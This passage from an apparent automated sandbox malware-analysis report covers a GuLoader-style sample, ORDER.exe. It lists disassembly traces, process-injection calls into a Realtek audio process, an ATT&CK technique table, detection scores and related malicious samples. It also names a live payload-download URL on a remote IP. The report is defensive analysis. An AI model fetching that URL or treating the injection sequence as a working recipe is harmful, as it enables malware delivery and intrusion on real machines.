      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242D454 mov eax, dword ptr fs:[00000030h]3_2_3242D454
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242D454 mov eax, dword ptr fs:[00000030h]3_2_3242D454
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242D454 mov eax, dword ptr fs:[00000030h]3_2_3242D454
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324EA464 mov eax, dword ptr fs:[00000030h]3_2_324EA464
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324DF478 mov eax, dword ptr fs:[00000030h]3_2_324DF478
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324B6400 mov eax, dword ptr fs:[00000030h]3_2_324B6400
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324B6400 mov eax, dword ptr fs:[00000030h]3_2_324B6400
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241640D mov eax, dword ptr fs:[00000030h]3_2_3241640D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32457425 mov eax, dword ptr fs:[00000030h]3_2_32457425
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32457425 mov ecx, dword ptr fs:[00000030h]3_2_32457425
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241B420 mov eax, dword ptr fs:[00000030h]3_2_3241B420
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324A9429 mov eax, dword ptr fs:[00000030h]3_2_324A9429
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324AF42F mov eax, dword ptr fs:[00000030h]3_2_324AF42F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324AF42F mov eax, dword ptr fs:[00000030h]3_2_324AF42F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324AF42F mov eax, dword ptr fs:[00000030h]3_2_324AF42F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324AF42F mov eax, dword ptr fs:[00000030h]3_2_324AF42F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324AF42F mov eax, dword ptr fs:[00000030h]3_2_324AF42F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324414C9 mov eax, dword ptr fs:[00000030h]3_2_324414C9
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324414C9 mov eax, dword ptr fs:[00000030h]3_2_324414C9
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324414C9 mov eax, dword ptr fs:[00000030h]3_2_324414C9
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324414C9 mov eax, dword ptr fs:[00000030h]3_2_324414C9
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324414C9 mov eax, dword ptr fs:[00000030h]3_2_324414C9
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244F4D0 mov eax, dword ptr fs:[00000030h]3_2_3244F4D0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244F4D0 mov eax, dword ptr fs:[00000030h]3_2_3244F4D0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244F4D0 mov eax, dword ptr fs:[00000030h]3_2_3244F4D0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244F4D0 mov eax, dword ptr fs:[00000030h]3_2_3244F4D0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244F4D0 mov eax, dword ptr fs:[00000030h]3_2_3244F4D0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244F4D0 mov eax, dword ptr fs:[00000030h]3_2_3244F4D0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244F4D0 mov eax, dword ptr fs:[00000030h]3_2_3244F4D0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244F4D0 mov eax, dword ptr fs:[00000030h]3_2_3244F4D0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3244F4D0 mov eax, dword ptr fs:[00000030h]3_2_3244F4D0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324444D1 mov eax, dword ptr fs:[00000030h]3_2_324444D1
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324444D1 mov eax, dword ptr fs:[00000030h]3_2_324444D1
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324554E0 mov eax, dword ptr fs:[00000030h]3_2_324554E0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324DF4FD mov eax, dword ptr fs:[00000030h]3_2_324DF4FD
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324264F0 mov eax, dword ptr fs:[00000030h]3_2_324264F0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245E4F1 mov eax, dword ptr fs:[00000030h]3_2_3245E4F1
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245E4F1 mov eax, dword ptr fs:[00000030h]3_2_3245E4F1
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245A4F0 mov eax, dword ptr fs:[00000030h]3_2_3245A4F0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245A4F0 mov eax, dword ptr fs:[00000030h]3_2_3245A4F0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324494FA mov eax, dword ptr fs:[00000030h]3_2_324494FA
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32420485 mov ecx, dword ptr fs:[00000030h]3_2_32420485
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245648A mov eax, dword ptr fs:[00000030h]3_2_3245648A
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245648A mov eax, dword ptr fs:[00000030h]3_2_3245648A
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245648A mov eax, dword ptr fs:[00000030h]3_2_3245648A
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245B490 mov eax, dword ptr fs:[00000030h]3_2_3245B490
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245B490 mov eax, dword ptr fs:[00000030h]3_2_3245B490
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324AC490 mov eax, dword ptr fs:[00000030h]3_2_324AC490
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324224A2 mov eax, dword ptr fs:[00000030h]3_2_324224A2
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324224A2 mov ecx, dword ptr fs:[00000030h]3_2_324224A2
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324AD4A0 mov ecx, dword ptr fs:[00000030h]3_2_324AD4A0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324AD4A0 mov eax, dword ptr fs:[00000030h]3_2_324AD4A0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324AD4A0 mov eax, dword ptr fs:[00000030h]3_2_324AD4A0
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324544A8 mov eax, dword ptr fs:[00000030h]3_2_324544A8
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324B84BB mov eax, dword ptr fs:[00000030h]3_2_324B84BB
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245E4BC mov eax, dword ptr fs:[00000030h]3_2_3245E4BC
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243E547 mov eax, dword ptr fs:[00000030h]3_2_3243E547
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32456540 mov eax, dword ptr fs:[00000030h]3_2_32456540
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32458540 mov eax, dword ptr fs:[00000030h]3_2_32458540
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3242254C mov eax, dword ptr fs:[00000030h]3_2_3242254C
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324FB55F mov eax, dword ptr fs:[00000030h]3_2_324FB55F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324FB55F mov eax, dword ptr fs:[00000030h]3_2_324FB55F
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324EA553 mov eax, dword ptr fs:[00000030h]3_2_324EA553
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243C560 mov eax, dword ptr fs:[00000030h]3_2_3243C560
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32422500 mov eax, dword ptr fs:[00000030h]3_2_32422500
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3241B502 mov eax, dword ptr fs:[00000030h]3_2_3241B502
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245C50D mov eax, dword ptr fs:[00000030h]3_2_3245C50D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245C50D mov eax, dword ptr fs:[00000030h]3_2_3245C50D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32441514 mov eax, dword ptr fs:[00000030h]3_2_32441514
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32441514 mov eax, dword ptr fs:[00000030h]3_2_32441514
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32441514 mov eax, dword ptr fs:[00000030h]3_2_32441514
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32441514 mov eax, dword ptr fs:[00000030h]3_2_32441514
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32441514 mov eax, dword ptr fs:[00000030h]3_2_32441514
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32441514 mov eax, dword ptr fs:[00000030h]3_2_32441514
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324CF51B mov eax, dword ptr fs:[00000030h]3_2_324CF51B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324CF51B mov eax, dword ptr fs:[00000030h]3_2_324CF51B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324CF51B mov eax, dword ptr fs:[00000030h]3_2_324CF51B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324CF51B mov eax, dword ptr fs:[00000030h]3_2_324CF51B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324CF51B mov eax, dword ptr fs:[00000030h]3_2_324CF51B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324CF51B mov eax, dword ptr fs:[00000030h]3_2_324CF51B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324CF51B mov ecx, dword ptr fs:[00000030h]3_2_324CF51B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324CF51B mov ecx, dword ptr fs:[00000030h]3_2_324CF51B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324CF51B mov eax, dword ptr fs:[00000030h]3_2_324CF51B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324CF51B mov eax, dword ptr fs:[00000030h]3_2_324CF51B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324CF51B mov eax, dword ptr fs:[00000030h]3_2_324CF51B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324CF51B mov eax, dword ptr fs:[00000030h]3_2_324CF51B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324CF51B mov eax, dword ptr fs:[00000030h]3_2_324CF51B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_324AC51D mov eax, dword ptr fs:[00000030h]3_2_324AC51D
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_32451527 mov eax, dword ptr fs:[00000030h]3_2_32451527
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3245F523 mov eax, dword ptr fs:[00000030h]3_2_3245F523
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243252B mov eax, dword ptr fs:[00000030h]3_2_3243252B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243252B mov eax, dword ptr fs:[00000030h]3_2_3243252B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243252B mov eax, dword ptr fs:[00000030h]3_2_3243252B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243252B mov eax, dword ptr fs:[00000030h]3_2_3243252B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243252B mov eax, dword ptr fs:[00000030h]3_2_3243252B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243252B mov eax, dword ptr fs:[00000030h]3_2_3243252B
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 3_2_3243252B mov eax, dword ptr fs:[00000030h]3_2_3243252B

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Users\user\Desktop\ORDER.exeNtSetContextThread: Indirect: 0x32193759Jump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeNtQueueApcThread: Indirect: 0x3218F55EJump to behavior
      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FFC36082651Jump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeNtResumeThread: Indirect: 0x32133D99Jump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeNtResumeThread: Indirect: 0x321F3D99Jump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeNtSuspendThread: Indirect: 0x32133A79Jump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeNtSuspendThread: Indirect: 0x321F3A79Jump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeNtQueueApcThread: Indirect: 0x3212F55EJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeNtQueueApcThread: Indirect: 0x321EF55EJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeNtResumeThread: Indirect: 0x32193D99Jump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeNtClose: Indirect: 0x3218F5EC
      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7FFC014C9E7F
      Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7FFC01433A8F
      Source: C:\Users\user\Desktop\ORDER.exeNtSuspendThread: Indirect: 0x32193A79Jump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeNtClose: Indirect: 0x321EF5EC
      Source: C:\Users\user\Desktop\ORDER.exeNtSetContextThread: Indirect: 0x32133759Jump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeNtClose: Indirect: 0x3212F5EC
      Source: C:\Users\user\Desktop\ORDER.exeNtSetContextThread: Indirect: 0x321F3759Jump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeThread register set: target process: 4652Jump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeThread register set: target process: 4652Jump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeThread register set: target process: 4652Jump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
      Source: C:\Users\user\Desktop\ORDER.exeProcess created: C:\Users\user\Desktop\ORDER.exe "C:\Users\user\Desktop\ORDER.exe"Jump to behavior
      Source: RAVCpl64.exe, 00000004.00000002.37012029407.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000000.32271307069.0000000000E40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
      Source: RAVCpl64.exe, 00000004.00000002.37012029407.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000000.32271307069.0000000000E40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
      Source: RAVCpl64.exe, 00000004.00000002.37012029407.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000000.32271307069.0000000000E40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
      Source: RAVCpl64.exe, 00000004.00000002.37012029407.0000000000E41000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000004.00000000.32271307069.0000000000E40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\ORDER.exeCode function: 0_2_00405D58 GetVersion,LdrInitializeThunk,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,0_2_00405D58

      Stealing of Sensitive Information

      barindex
      Source: Yara matchFile source: 00000003.00000002.32881458791.0000000032090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

      Remote Access Functionality

      barindex
      Source: Yara matchFile source: 00000003.00000002.32881458791.0000000032090000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API
      1
      DLL Side-Loading
      312
      Process Injection
      11
      Masquerading
      OS Credential Dumping111
      Security Software Discovery
      Remote Services1
      Archive Collected Data
      1
      Encrypted Channel
      Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
      Abuse Elevation Control Mechanism
      312
      Process Injection
      LSASS Memory1
      Process Discovery
      Remote Desktop Protocol1
      Clipboard Data
      1
      Ingress Tool Transfer
      Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading
      1
      Deobfuscate/Decode Files or Information
      Security Account Manager2
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared Drive1
      Non-Application Layer Protocol
      Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
      Abuse Elevation Control Mechanism
      NTDS13
      System Information Discovery
      Distributed Component Object ModelInput Capture11
      Application Layer Protocol
      Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
      Obfuscated Files or Information
      LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading
      Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand
      SourceDetectionScannerLabelLink
      ORDER.exe11%ReversingLabs
      ORDER.exe20%VirustotalBrowse
      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dll1%VirustotalBrowse
      No Antivirus matches
      No Antivirus matches
      SourceDetectionScannerLabelLink
      http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%Avira URL Cloudsafe
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
      http://107.150.19.141/ZngvhChQIdIscdxVPVXD182.bin0%Avira URL Cloudsafe
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%Avira URL Cloudsafe
      http://107.150.19.141/ZngvhChQIdIscdxVPVXD182.binP0%Avira URL Cloudsafe
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%Avira URL Cloudsafe
      http://nsis.sf.net/NSIS_Error0%VirustotalBrowse
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd0%VirustotalBrowse
      http://107.150.19.141/0%Avira URL Cloudsafe
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-2140%VirustotalBrowse
      http://107.150.19.141/2%VirustotalBrowse
      http://107.150.19.141/ZngvhChQIdIscdxVPVXD182.binj0%Avira URL Cloudsafe
      http://nsis.sf.net/NSIS_ErrorError0%Avira URL Cloudsafe
      http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%Avira URL Cloudsafe
      http://nsis.sf.net/NSIS_ErrorError0%VirustotalBrowse
      http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
      http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD0%VirustotalBrowse
      http://107.150.19.141/ZngvhChQIdIscdxVPVXD182.bin80%Avira URL Cloudsafe
      http://107.150.19.141/ZngvhChQIdIscdxVPVXD182.bint0%Avira URL Cloudsafe
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd0%VirustotalBrowse
      No contacted domains info
      NameMaliciousAntivirus DetectionReputation
      http://107.150.19.141/ZngvhChQIdIscdxVPVXD182.binfalse
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtdORDER.exe, 00000003.00000001.32174271412.00000000005F2000.00000020.00000001.01000000.00000008.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://nsis.sf.net/NSIS_ErrorORDER.exefalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214ORDER.exe, 00000003.00000001.32174271412.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.ORDER.exe, 00000003.00000001.32174271412.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtdORDER.exe, 00000003.00000001.32174271412.00000000005F2000.00000020.00000001.01000000.00000008.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://107.150.19.141/ZngvhChQIdIscdxVPVXD182.binPORDER.exe, 00000003.00000002.32870989524.00000000022EE000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32516873617.00000000022ED000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://107.150.19.141/ORDER.exe, 00000003.00000002.32870989524.0000000002310000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32255056072.0000000002321000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32516640693.0000000002321000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32516873617.0000000002310000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32254813697.000000000231F000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000002.32870989524.0000000002321000.00000004.00000020.00020000.00000000.sdmpfalse
      • 2%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://107.150.19.141/ZngvhChQIdIscdxVPVXD182.binjORDER.exe, 00000003.00000002.32870989524.00000000022EE000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32516873617.00000000022ED000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://nsis.sf.net/NSIS_ErrorErrorORDER.exefalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTDORDER.exe, 00000003.00000001.32174271412.0000000000626000.00000020.00000001.01000000.00000008.sdmpfalse
      • 0%, Virustotal, Browse
      • Avira URL Cloud: safe
      unknown
      http://www.gopher.ftp://ftp.ORDER.exe, 00000003.00000001.32174271412.0000000000649000.00000020.00000001.01000000.00000008.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://107.150.19.141/ZngvhChQIdIscdxVPVXD182.bin8ORDER.exe, 00000003.00000002.32870989524.00000000022EE000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32516873617.00000000022ED000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://107.150.19.141/ZngvhChQIdIscdxVPVXD182.bintORDER.exe, 00000003.00000002.32870989524.00000000022EE000.00000004.00000020.00020000.00000000.sdmp, ORDER.exe, 00000003.00000003.32516873617.00000000022ED000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      107.150.19.141
      unknownUnited States
      8100ASN-QUADRANET-GLOBALUSfalse
      Joe Sandbox version:40.0.0 Tourmaline
      Analysis ID:1509918
      Start date and time:2024-09-12 10:13:57 +02:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 15m 19s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
      Run name:Suspected Instruction Hammering
      Number of analysed new started processes analysed:5
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:1
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:ORDER.exe
      Detection:MAL
      Classification:mal96.troj.evad.winEXE@3/14@0/1
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 91%
      • Number of executed functions: 61
      • Number of non-executed functions: 273
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
      • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
      • Excluded domains from analysis (whitelisted): login.live.com, ctldl.windowsupdate.com, clients.config.office.net
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
      No simulations
      No context
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      ASN-QUADRANET-GLOBALUSjMMTZcFBa8.elfGet hashmaliciousMirai, OkiruBrowse
      • 155.94.232.241
      S5RSIJ1pA1.exeGet hashmaliciousRedLineBrowse
      • 194.49.68.19
      GLP3VibiyA.exeGet hashmaliciousAsyncRAT, PureLog StealerBrowse
      • 64.188.9.175
      fYHJsEQSv0.exeGet hashmaliciousRemcosBrowse
      • 162.218.211.203
      XQmV6MKs53.exeGet hashmaliciousRemcosBrowse
      • 162.218.211.203
      SecuriteInfo.com.Exploit.CVE-2017-11882.123.4528.19655.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
      • 204.44.124.137
      Bill of Lading.xlsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
      • 204.44.124.137
      SecuriteInfo.com.Linux.Siggen.9999.8352.26322.elfGet hashmaliciousMiraiBrowse
      • 172.93.183.162
      firmware.armv4l.elfGet hashmaliciousUnknownBrowse
      • 104.129.59.5
      firmware.armv5l.elfGet hashmaliciousUnknownBrowse
      • 104.129.59.5
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      C:\Users\user\AppData\Local\Temp\nst4C1A.tmp\System.dllulACwpUCSU.exeGet hashmaliciousFormBook, GuLoaderBrowse
        fJuwM4Bwi7.exeGet hashmaliciousFormBook, GuLoaderBrowse
          ulACwpUCSU.exeGet hashmaliciousGuLoaderBrowse
            fJuwM4Bwi7.exeGet hashmaliciousGuLoaderBrowse
              Factura 02297-23042024.exeGet hashmaliciousFormBook, GuLoaderBrowse
                anebilledes.exeGet hashmaliciousFormBook, GuLoaderBrowse
                  Factura 02297-23042024.exeGet hashmaliciousGuLoaderBrowse
                    anebilledes.exeGet hashmaliciousGuLoaderBrowse
                      Purchase Order1613400027654123.pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse
                        Process:C:\Users\user\Desktop\ORDER.exe
                        File Type:TTComp archive data, binary, 1K dictionary
                        Category:dropped
                        Size (bytes):423918
                        Entropy (8bit):7.056310992282221
                        Encrypted:false
                        SSDEEP:6144:LR/oEr7eSvNoL2p1W6HbPaQhjyywLs2pIvDwKRQtv6ZHHbcdp7gE2bA:LbeSvNoCpcdOh7Yuxk
                        MD5:FCBEE77EDA0CE7EB77135B3D6F72B73A
